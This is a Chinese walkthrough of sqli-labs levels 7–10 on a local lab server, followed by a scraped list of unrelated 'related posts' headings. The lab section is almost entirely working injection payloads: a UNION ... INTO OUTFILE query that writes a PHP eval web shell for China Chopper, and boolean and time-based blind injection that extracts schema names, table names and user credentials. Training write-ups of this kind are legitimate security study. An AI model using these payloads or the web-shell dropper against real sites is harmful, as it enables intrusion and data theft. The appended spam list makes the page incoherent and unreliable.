2sqli_labs 7
1.直接用?id='判断是否有注入点,如果返回数据库错误则可以注入。
2.同样用之前的方法不断测试发现id被((''))包裹
3. http://127.0.0.1/sqli/Less-7/?id=1')) order by 3--+ 查看有多少列
4. http://127.0.0.1/sqli/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST[“crow”]);?>' into outfile "C:\\phpstudy\\PHPTutorial\\WWW\\sqli\\Less-7\\test.php" --+ 将一句话木马写入其中
5. 使用中国菜刀访问即可!

sqli_labs 8
第一种仍然使用老方法布尔盲注
1. http://127.0.0.1/sqli/Less-8/?id=1’ 判断此时存在注入漏洞
2.  http://127.0.0.1/sqli/Less-8/?id=1‘ order by 3--+   当3改为4的时候,you are in….消失,说明存在三列。
3. http://127.0.0.1/sqli/Less-8/?id=1' and left((select database()),1)=0x73 --+猜出来当前第一位是s
或者是使用: http://127.0.0.1/sqli/Less-8/?id=1‘ and ascii(substr((select database()),1,1)) > 16--+ 此时是有回显的。
4. http://127.0.0.1/sqli/Less-8/?id=1‘ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >17 --+ 先通过大于号或者小于号来判断数据库的第一个字母是哪一个,
也可以使用http://127.0.0.1/sqli/Less-8/?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1)) = 115--+ 此时可以验证数据库中第五个数据库的第一个字母是s
5. http://127.0.0.1/sqli/Less-8/?id=1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),1,1)) >11 --+ 判断security数据库中的第4个表中的数据的第一位是否大于11, 
也可以使用 http://127.0.0.1/sqli/Less-8/?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),1,1)) =117 --+ 
验证数据库中第4个表中的数据的第一位的第一个字母的ascii码是否是117,也就是 u
6. http://127.0.0.1/sqli/Less-8/?id=1‘ and  ascii(substr((select column_name from information_schema.columns where table_name = 0x7573657273 limit 1,1),1,1)) >10 --+ 
同理,进行判断表中的字段,然后进行判断。可以得到username,password;
7. http://127.0.0.1/sqli/Less-8/?id=1‘  and ascii(substr((select username from security.users limit 0,1),1,1)) >10 --+ 
同理,进行判断,最后再使用password进行判断。
8. 因为猜解速度较慢,可以配合burpsuite或者是sqlmap的脚本来使用。

第二种使用时间盲注
通过if结合sleep()函数,通过反应时间来快速判断
1. http://127.0.0.1/sqli/Less-8/?id=1‘ and sleep(5)--+ 使用延迟的方法判断是否存在注入漏洞。当然判断是否存在注入漏洞的方法很多。
2.  http://127.0.0.1/sqli/Less-8/?id=1‘ and if(length(database()) = 8,1,sleep(5))--+ 当为8的时候很快加载,而为其他值得时候加载较慢(5s左右),那就说明此时数据库的长度就是8(security)
3. http://127.0.0.1/sqli/Less-8/?id=1' and if(ascii(substr((select database()),1,1)) >113,1,sleep(5))--+如果当前数据库的第一个字母的ascii值大于113的时候,会立刻返回结果,否则执行5s。
4. http://127.0.0.1/sqli/Less-8/?id=1‘ and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>112,1,sleep(5))--+ 同理判断数据库中的第5个数据库的第一位的ascii的值是不是大于112(实际中是115),如果是的则速度返回,否则延时5s返回结果。
5. 其余步骤与法一基本类似,可以采用burpsuite或者是sql盲注脚本使用。

sqli_labs 9
第九关与第八关类似,因为只回显you are in所以只能用时间盲注来判断。
1. http://127.0.0.1/sqli/Less-9/?id=1‘  order by 3999--+ 当使用order by的时候,此时无论如何都是回显you are in….所以无法使用order by进行判断。
2. http://127.0.0.1/sqli/Less-9/?id=1‘ and sleep(5)--+ 当存在注入漏洞时,可以使用延迟注入进行判断,此时若存在漏洞,则睡眠5s之后再返回结果。
3. http://127.0.0.1/sqli/Less-9/?id=1‘ and if(length(database())=8,1,sleep(5)); 通过返回时间进行判断,此时如果数据库长度为8,则可以较快返回。
4. http://127.0.0.1/sqli/Less-9/?id=1‘ and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>1112,1,sleep(5))--+ 使用less-8中同样的方法进行判断即可!
5. 因为盲注属于猜解,推荐使用脚本进行操作。

sqli_labs 10
第十关与第九关一样,只是id值被""包裹

sql注入——day02相关推荐

  1. php mysql 防 sql注入_php 防sql注入方法

    php防sql注入的方法:1.使用mysql_real_escape_string方法转义SQL语句中使用的字符串中的特殊字符:2.打开magic_quotes_gpc来防止SQL注入:3.通过自定义 ...

  2. resultset mysql_MySQL数据库学习笔记(九)----JDBC的ResultSet接口(查询操作)、PreparedStatement接口重构增删改查(含SQL注入的解释)...

    [声明] 欢迎转载,但请保留文章原始出处→_→ [正文] 一.ResultSet接口的介绍: 对数据库的查询操作,一般需要返回查询结果,在程序中,JDBC为我们提供了ResultSet接口来专门处理查 ...

  3. mybaits的模糊查询_mybatis模糊查询防止SQL注入(很详细)

    SQL注入,大家都不陌生,是一种常见的攻击方式.攻击者在界面的表单信息或URL上输入一些奇怪的SQL片段(例如"or '1'='1'"这样的语句),有可能入侵参数检验不足的应用程序 ...

  4. SQL注入漏洞全接触--入门篇

    随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进 ...

  5. Sql注入和Html注入

    举例说,有一间公司的网页服务器上有一个留言板的代码,用来让用户发表简短的口信,例如: hello word!!!! 不过,这个代码原来有漏洞.一个意图入侵者得悉这间公司采用了有问题的代码,于是试图通过 ...

  6. mysql注入实例获取答案_本文实例讲述了MySQL解决SQL注入的另类方法。分享给大家供大家参考,具体如下:问题解读我觉得,这个问题每年带来的成本可以高达数十亿美元了。本文就来谈谈,...

    本文实例讲述了MySQL解决SQL注入的另类方法.分享给大家供大家参考,具体如下: 问题解读 我觉得,这个问题每年带来的成本可以高达数十亿美元了.本文就来谈谈,假定我们有如下 SQL 模板语句: se ...

  7. 【数据库】 兴唐第二十七节课只sql注入

    首先来一个用户登录程序 public static void login(String username, String password) {Connection conn = null;State ...

  8. 雷林鹏分享:MySQL 及 SQL 注入

    MySQL 及 SQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题. 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入 ...

  9. WEB攻击手段及防御第2篇-SQL注入

    概念 SQL注入即通过WEB表单域插入非法SQL命令,当服务器端构造SQL时采用拼接形式,非法SQL与正常SQL一并构造并在数据库中执行. 简单的SQL注入的例子: 例1:test123456 or ...

最新文章

  1. spring MVC、mybatis配置读写分离
  2. 微软宣布公开预览其内容分发网络
  3. 技术负责人所需的四个核心能力,你具备几个?
  4. 防范SQL指令植入式***
  5. ubuntu下为opera26.0安装flash
  6. Leet Code OJ 2. Add Two Numbers [Difficulty: Medium]
  7. 1036 Boys vs Girls (25 分)_27行代码AC
  8. 学go语言能做什么工作?
  9. ibatis+Castle.MCV 版 NPetshop3
  10. LogBack 打印 ES的DSL日志信息
  11. 区块链技术基础语言(三十二):Go语言网络编程(下)
  12. 【nginx】【转】Nginx核心进程模型
  13. Invalid prop: type check failed for prop price. Expected String, got Number.
  14. 深度学习在图像识别上的应用
  15. 22.1.11京东大数据实习面试
  16. bandizip修改压缩文件内容_即将对文件压缩软件Bandizip进行的更改
  17. oracle查询语句 switch,ORACLE SQL语句中的“SWITCH语句”函数DECODE
  18. Android星座运势案例
  19. 网页自动填表html,WebBrowser1.HtmlInput 实现浏览器文本自动填写与点击
  20. 下载的时候提示:“写入到文件时产生错误(请用磁盘检查工具检查修复)”的解决办法

热门文章

  1. android编程获取网络和wifi状态及调用网络设置界面,Android编程获取网络连接状态(3G/Wifi)及调用网络配置界面 - Android平台开发技术 - 博客园...
  2. mysql求女生人数_在读女硕士110多万!为什么越来越多的女生选择考研?
  3. pyqt5 tableview 设置行颜色_Tools Ⅰ:如何用 PyQt5 和 Qt Designer 在 Pycharm 中愉快地开发软件...
  4. java简单工厂模式_Java 简单工厂模式
  5. 干货|用配电安全基础知识及隐患排查重点PPT
  6. vs2010调用matlab2010b,VS2010调用matlab2010b引擎
  7. 开发商微信选房后不退认筹金_认筹金贸然转定金退不回 购房人认栽?
  8. 成功解决ValueError: fill value must be in categories
  9. CV之IS:利用pixellib库基于deeplabv3_xception模型对《庆余年》片段实现语义分割/图像分割简单代码全实现
  10. DL之pix2pix(cGAN)之AC:基于pix2pix(cGAN)模型实现对图像实现Auto Color自动上色技术